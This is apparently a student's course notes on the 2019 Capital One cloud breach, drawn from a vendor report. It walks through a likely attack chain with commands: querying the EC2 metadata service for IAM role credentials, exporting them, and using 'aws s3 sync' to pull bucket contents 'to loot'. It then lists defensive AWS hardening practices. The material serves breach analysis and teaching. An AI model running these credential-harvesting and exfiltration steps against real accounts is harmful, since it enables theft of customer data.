Ops 401 Class 16
All content is cited from a report dated March 2020 by Cloudneeti.
The Capital One data breach from almost a year ago was one of the most devastating data breaches of all time. A trusted financial services brand, Capital One has been a leader in digital transformation within the banking industry and a sophisticated user of cloud infrastructure. This major cloud data breach serves as a valuable lesson for any organization storing confidential information in the cloud.
Soon after the breach was reported, unwarranted speculation spread on the internet, including suggestions that a single product or a set of professional services could have prevented such an attack. Taking advantage of information that has since become available, Cloudneeti has updated this research note with a technical illustration of the attack and possible ways to prevent such data breaches. On July 29, 2019, the FBI arrested Paige A. Thompson (also known by the alias “erratic”) for allegedly hacking into Capital One databases and stealing the data.
Capital One disclosed the estimated data loss at approximately 1 million Social Insurance Numbers of Canadian credit card customers, about 140,000 Social Security numbers, and about 80,000 linked bank account numbers of credit card customers.
AWS provided their assessment of the incident: "As Capital One outlined in their public announcement, the attack occurred due to a misconfiguration error at the application layer of a firewall installed by Capital One, exacerbated by permissions set by Capital One that were likely broader than intended. After gaining access through the misconfigured firewall and having broader permission to access resources, we believe a SSRF attack was used (which is one of several ways an attacker could have potentially gotten access to data once they got in through the misconfigured firewall)."
While the indictment is not specific about the nature of the attack, the following is our best guess regarding the likely steps taken by “erratic” to compromise the data.
STEP 1: Log in to the EC2 instance using SSH
It’s very likely an EC2 instance was left over from a previous deployment with open SSH access. This instance was used to perform the SSRF attack.
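A minimal sketch of what that initial access might have looked like; the key file and IP address are hypothetical placeholders:

```bash
# Hypothetical: an orphaned EC2 instance still reachable over SSH with a stale key pair.
ssh -i old-deploy-key.pem ec2-user@203.0.113.10   # placeholder key name and documentation IP
```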
STEP 2: Discover a weak IAM role
Using the EC2 instance, the attacker must have been able to call the instance metadata service endpoint from the SSH command prompt, something like this: http://169.254.169.254/latest/meta-data/iam/security-credentials/
The endpoint must have returned a role name (according to the indictment, ‘*****-WAF-Role’).
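A sketch of that query from the compromised shell; with IMDSv1 the metadata service requires no authentication:

```bash
# List the IAM role attached to this instance via the metadata service (IMDSv1, no credentials needed).
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Example output (role name redacted, as in the indictment): *****-WAF-Role
```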
STEP 3: Gain temporary credentials
Using the role name, the attacker could then have queried the role-specific endpoint to obtain temporary credentials: http://169.254.169.254/latest/meta-data/iam/security-credentials/*****-WAF-Role
That call would return the full set of temporary credentials: { AccessKeyId: "", SecretAccessKey: "", ... }
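Fetching that role-specific path returns short-lived credentials that can be exported for use with the AWS CLI. A hedged sketch; the asterisks stand for the redacted role name and the exported values are placeholders:

```bash
# Retrieve temporary credentials for the exposed role (***** is the redacted name from the indictment).
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/*****-WAF-Role

# The JSON response also includes a session token; all three values are needed for the CLI
# to act as the role. Placeholder values shown below.
export AWS_ACCESS_KEY_ID=ASIAEXAMPLE
export AWS_SECRET_ACCESS_KEY=examplesecretkey
export AWS_SESSION_TOKEN=examplesessiontoken
```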
STEP 4: Gain access to S3 buckets by calling the AWS S3 ls and sync CLI commands
$ aws s3 ls
The ls command lists all the S3 buckets accessible with the IAM role.
$ aws s3 sync s3://somebucket .
The sync command downloads every object in ‘somebucket’ to the local machine.
In summary, the most likely root cause of the attack was a poor security architecture design that exposed S3 buckets, via the AWS WAF/EC2 instance, to anyone who could use the instance’s IAM role. While the S3 buckets were not exposed to the internet as in many other breaches, an EC2 instance with an excessively permissive IAM role was likely the culprit. The original report includes a diagram of the likely deployed architecture; “compromising” the poorly configured WAF was a trivial step.
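With the environment variables from step 3 set, the exfiltration described above reduces to a few CLI calls. A sketch, reusing the placeholder bucket name from the report:

```bash
aws sts get-caller-identity            # confirm the CLI is now acting as the exposed role
aws s3 ls                              # enumerate every bucket the role can see
aws s3 sync s3://somebucket ./loot     # bulk-download the bucket's contents locally
```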
AWS Governance Practices
The following AWS governance practices would help prevent such attacks:
- Don't allow EC2 instances to have IAM roles that allow attaching or replacing role policies in any production environments.
- Clean up unused cloud resources (especially EC2 instances and S3 buckets) left over from prior development or production debugging efforts.
- Review S3 bucket permissions, policies and access via both automation and manual audits.
- AWS lists a few basics here: https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/. Cloudneeti automates hundreds of these policies and provides security and compliance views across all AWS accounts.
- Use CloudTrail, CloudWatch, and/or AWS Lambda services to review and automate specific actions taken on S3 resources.
- Periodically review IAM roles:
  - Ensure each application, EC2 instance, or autoscaling group has its own IAM role. Do not share roles across unrelated applications.
  - Scope the permissions of each role to enable access only to the AWS resources required. The “WAF” role described above did not require access to list S3 buckets “in the normal course of business” (according to the indictment).
  - If possible, include a “Condition” statement within the IAM role to scope the access to known IP addresses or VPC endpoints, as in the sketch after this list.
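As a sketch of that last point, an inline role policy can combine least privilege with a Condition that only honors requests arriving through a known VPC endpoint. The role name, bucket, and endpoint ID below are hypothetical:

```bash
# Hypothetical inline policy: S3 read access only, and only via a specific VPC endpoint.
cat > scoped-s3-read.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["s3:GetObject", "s3:ListBucket"],
      "Resource": [
        "arn:aws:s3:::example-app-bucket",
        "arn:aws:s3:::example-app-bucket/*"
      ],
      "Condition": {
        "StringEquals": { "aws:SourceVpce": "vpce-0example1234567890" }
      }
    }
  ]
}
EOF

# Attach the policy to the role (names are placeholders).
aws iam put-role-policy \
  --role-name example-waf-role \
  --policy-name scoped-s3-read \
  --policy-document file://scoped-s3-read.json
```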
If the following AWS cloud resource configurations had been in place, the attack would likely have been prevented (a CLI sketch for spot-checking a few of them follows the list):
- AWS IAM: Ensure least privileged IAM instance roles are used for AWS resource access from instances.
- AWS IAM: Ensure IAM policies are attached only to groups or roles
- AWS S3: Ensure AWS S3 buckets do not allow public READ access
- AWS S3: Ensure AWS S3 buckets do not allow public READ_ACP access
- AWS S3: Ensure AWS S3 buckets do not allow public WRITE_ACP access
- AWS S3: Ensure S3 buckets do not allow FULL_CONTROL access to AWS authenticated users via S3 ACLs
- AWS S3: Ensure that Amazon S3 buckets access is limited only to specific IP addresses
- AWS S3: Ensure S3 buckets do not allow READ access to AWS authenticated users through ACLs
- AWS S3: Ensure all S3 buckets have a policy requiring server-side and in-transit encryption for all objects stored in the bucket
- AWS Networking: Ensure no Application Load Balancer (ALB) exposes the administrative service SSH (TCP:22) to the public internet
- AWS Networking: Ensure no security groups allow ingress from 0.0.0.0/0 to port 22 (SSH)
- AWS Networking: Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389 (RDP)
- AWS - Audit and Logging: Ensure S3 bucket access logging is enabled on the CloudTrail S3 bucket
- AWS - Audit and Logging: Ensure CloudTrail is enabled in all regions
- AWS - Audit and Logging: Ensure CloudTrail trails are integrated with CloudWatch Logs
- AWS - Audit and Logging: Ensure the S3 bucket used to store CloudTrail logs is not publicly accessible
- AWS - Monitoring: Ensure a log metric filter and alarm exist for CloudTrail configuration changes.
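A few of the items above can be spot-checked or enforced directly from the AWS CLI. A hedged sketch; the account ID is a placeholder:

```bash
# S3: block all forms of public access for the entire account.
aws s3control put-public-access-block \
  --account-id 111122223333 \
  --public-access-block-configuration \
      BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true

# Networking: list security groups that allow SSH (port 22) from 0.0.0.0/0.
aws ec2 describe-security-groups \
  --filters Name=ip-permission.from-port,Values=22 Name=ip-permission.cidr,Values=0.0.0.0/0 \
  --query 'SecurityGroups[].GroupId'

# Audit and logging: check whether existing CloudTrail trails cover all regions.
aws cloudtrail describe-trails --query 'trailList[].IsMultiRegionTrail'
```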
These configurations can be part of manual deployment documentation or, ideally, part of the Infrastructure as Code (IaC) automation within DevOps pipelines, which would prevent these misconfigurations from reaching production in the first place (sketched below). A cloud security posture management solution like Cloudneeti could be used by Cloud Ops or DevOps teams to continuously validate their security posture in preproduction and production environments.
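As a sketch of the IaC approach, the “no world-open SSH” control can be expressed as a CloudFormation template and deployed from a pipeline, so the misconfiguration never reaches production. The template contents, VPC ID, and stack name are hypothetical:

```bash
# Hypothetical template: a security group with no 0.0.0.0/0 ingress on port 22.
cat > app-sg.yaml <<'EOF'
AWSTemplateFormatVersion: '2010-09-09'
Resources:
  AppSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      GroupDescription: Application traffic only; no public SSH ingress
      VpcId: vpc-0example1234567890
      SecurityGroupIngress:
        - IpProtocol: tcp      # HTTPS from the internal load balancer range only
          FromPort: 443
          ToPort: 443
          CidrIp: 10.0.0.0/16
EOF

# Deploy the template as a stack (typically run as a pipeline step).
aws cloudformation deploy --stack-name app-sg --template-file app-sg.yaml
```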
The industry was understandably shocked by the sheer scale of the attack against one of the most trusted brands operating on one of the most secure infrastructures. There are several lessons to be learned.
Misconfiguration can cause catastrophic losses, and the Capital One experience is only one of many known cases. We anticipate seeing more breaches at companies that have not kept up with the pace of change in their cloud environments and have not implemented adequate cloud security and compliance assurance.
This content is relevant to our coursework because it examines a significant recent data breach and introduces key takeaways that security professionals should keep in mind so that the organizations they work for are not subject to the same misconfigurations and oversights, which could lead to similar consequences.